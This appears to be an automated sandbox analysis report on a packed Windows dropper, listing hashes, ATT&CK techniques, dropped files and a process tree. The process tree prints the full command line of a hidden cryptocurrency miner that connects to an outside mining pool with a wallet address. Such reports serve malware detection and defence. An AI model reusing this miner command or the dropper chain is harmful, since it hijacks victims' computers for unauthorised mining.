73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
21/02/2024, 02:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2148	b2e.exe
2492	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe
2492	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4904-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4904 wrote to memory of 2148	4904	batexe.exe	85
PID 4904 wrote to memory of 2148	4904	batexe.exe	85
PID 4904 wrote to memory of 2148	4904	batexe.exe	85
PID 2148 wrote to memory of 404	2148	b2e.exe	86
PID 2148 wrote to memory of 404	2148	b2e.exe	86
PID 2148 wrote to memory of 404	2148	b2e.exe	86
PID 404 wrote to memory of 2492	404	cmd.exe	89
PID 404 wrote to memory of 2492	404	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4904
- C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7AD8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:404
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe

Filesize
1.3MB

MD5
21370f960e516e529e3374acb341d2ba

SHA1
36a6e05cecec7d8e8abad2a4209f1631c0c187e5

SHA256
d6f9bd5b8b679d0e283ad4ef6823512ac48ebd6c45c588e84718230cc97d54cb

SHA512
9abf2592489f1194f06ce0064a70e51116ea289cbfaaa157737a5adfd0b45bdc1638b2dd9c39187c07c455cf9b82ecec7a463ab102be8c760ffb840679a6cd18

Download Submit
C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe

Filesize
2.3MB

MD5
7a0a581615ec5b248c5006bfabe57117

SHA1
981ea0f34d70646c18be9c9c59873f46a5c89816

SHA256
09b79eb2ab2f1483f54536fb58e4a06402128629971cb9dac46d5d8a2ba04ebb

SHA512
13b6d0d98f090008933007caa1263daa40036ec8054a208d163a6383aece84b89660efcdc36198799c8e9aaca9296533fbe881788db860ed706ecae284da22e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\6DA9.tmp\b2e.exe

Filesize
2.5MB

MD5
17426e4da15ee9371ff36ae5e88c8fdd

SHA1
0ac7984792a2569cf7df5299abbfe559a0871eb1

SHA256
f77f718567dc0276d148754a7597126c84d144737db0aff4ffb7666e90ad2980

SHA512
70ec35c71282af6a1a34c1c07d5b5f825bde9727ad7c4200f8745743f6e9f6937022e4af5a5059c7d7b6bf6004936eda6b298d2bee9990ec49992a7d891bfe07

Download Submit
C:\Users\Admin\AppData\Local\Temp\7AD8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
741KB

MD5
fba4c0ce9aa0fe67d5c6e9e453aabf40

SHA1
7f35d71657874537eb80a6c6b7b22b1e0e306109

SHA256
00219768cf5b42fa87a9b69c7d9f2be0d9ea77327ebdaf03913666843cc6818e

SHA512
9d36d782771e9e7b658cd5914706269cf95c0080a5cc3dfb0ecd83dbe5716828eb919567a9ea42be54cd8fdd8bed152e0490e11791eb57e2db430c690b783b41

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
428KB

MD5
2b547104d38c82d0cb6ce5a883c9c1f3

SHA1
8216f92fdac3d80b8767d4a9de408efad3c084a9

SHA256
1312d5fe1ed9f1786a06fa2972cbb2aa3c142c172a5700bb6a5da79b85065a97

SHA512
8d0e455b2f8895a61c3c6321e51c1c521d83c092f92e9161a31a7fc315886e1021553f81e6096d78cc1d5d4283e7fdd197b1761e41140daa6d5facc47db827fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
350KB

MD5
bd38ca77d9ec3bc92b2571890b62516a

SHA1
34e801df216f11bdf937192892ddcd6befcc53cf

SHA256
84a725b02d23803606e60950a6fe6bdab9e48f4c56b5f8cc7a31b46fa35ab7c0

SHA512
3ad63d3ae18b15a3a85a0e4be39841f7ff126f4de813f7f5d0c315cfc50c2b5d118d031b09c616b0ada34ea0d2969ac984e983f86d498de7315ce122a6c2ebb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
814KB

MD5
6438d965b55fdb1cdb7803a98aeb7c89

SHA1
3d49669ea48f39a67b8daf77c0cad2d21b06c3ca

SHA256
e7b39e6692f9d6489325fddfafc1ee5232e6906b63e1107754f8ac248aa4b2fe

SHA512
57b0b26f961f6ef559339bc8a5a3613b0ffe7f04200ca0145064d58425a8bdf8e1eae92b5714ac6cb11c8e0db9a92969d49e7364a5918eaf377502f38cb21509

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
debfac441a3cd55cc416a70a2e2bbf7e

SHA1
5715c2a6788756477f5b6fb735fc0784313c48d4

SHA256
68e5ccfe26b4e0eec8d094425607967633b374ed2ad796ae36aea05963f79b3e

SHA512
145de3f4a1fe3715e0c6c50dc2806c50c4c1b95488816e9cc97602d54a84210bdf49cc5f908a59926e155041c89cea744563b67005293a089732a7eb8db40de4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
455KB

MD5
5b70c6fc99d580c67c114113707aea72

SHA1
79cc837d0de226a6a01ea01ab0d247cdcbeb8eea

SHA256
46e7c5a04892728131eea469a154962eea8d3300aea54a84def006d66317b8e4

SHA512
63e17f77ea130486924d41ff1b8665ffdb724c6fb82e5cfe66a5e817f6ed7671790cf68c9b2c89ed0d544e37819bbb0a5c45eddc53f129fc612fb27861bdb0e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
403KB

MD5
3895b8881032e8fb024ae6a103cebdf3

SHA1
8dccebb93ade3760a3bd9f23f6f769d3860d7dc9

SHA256
551ae6c46567258c9afb6a80851fe1882d7589c1c81bdf3088b4231f20384739

SHA512
465991a33e8fef44f54cac61ae16b7198fe930245f071bc0ca65ace8a3df61eb1572e0daced179d7aff1757b203cfc167e93fa7afd0d456e896c076f50646bc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
531KB

MD5
71998eb9b29ebc1cb99a6cc72be73183

SHA1
6eb764d628bb64dc59b52c5a13f5a5fe66097fdf

SHA256
56bb5649f9fe1e73b036ee460a858ba21518d629fc8bb58a761cd11192942f51

SHA512
01fc27322caf3c6a20c0c62eb23c2fc6285b24a2e0ed1ee8be01502d01586e0279afc50fbf5d896f920786ebae23baa6e3a51e43e0602c8cbb4c44aed330bbbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
424KB

MD5
c2b09f3e1a6797933ae427a5a0e2cfda

SHA1
00b7645e8b6f31cf45106b0a281597631ee3c372

SHA256
be690c581ec96a48b26ad5fc569384b284be383feaf93ddfe579ac4e382dc80c

SHA512
99fe1d27a1109a610e57ef2a089f191a325c5cbc5e89ed45ff906611f8af494702c51eb5979986f0eb2121b05ac5e58ec16433318672210d759983f0579782dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
591KB

MD5
a98b132fa2cd210358920e315b24318c

SHA1
fb791005b51af3e4642cae757619e0634bc35966

SHA256
666cdbc1ba2eeb08cbe24067406a1c1b4299cf9f09191cb1f3a42754e8ec6e30

SHA512
cb4a19e03721ce09ce52166f345b1624fb9d18abdb7c1fe5aa6d362bd1b55d034162a66ffd1186764f26dd9f51ce268240c9dd67140b1f1c0ef81fbaf39d341a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
540KB

MD5
db360be61a5d2a76a4c76b3fb8b133f7

SHA1
7823f5409b7281915f02fe60d8d4541a56c7c0f9

SHA256
341a7262cf48fd6fdb2a98d83da80da88f0f99a97c9099fafb7e41f0fcca4f27

SHA512
08bdd0e5f49a5c937229d6fe725f88bc2aebbe02ffd7ed591760c6179965f92745866c6619a27ad4e0eaf7ff62799b6ca2b8b982c490e408842e6d38fca6cbc2

Download Submit
memory/2148-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2148-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2492-47-0x0000000001060000-0x0000000002915000-memory.dmp

Filesize
24.7MB

Download
memory/2492-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2492-45-0x0000000051D90000-0x0000000051E28000-memory.dmp

Filesize
608KB

Download
memory/2492-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2492-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2492-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4904-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download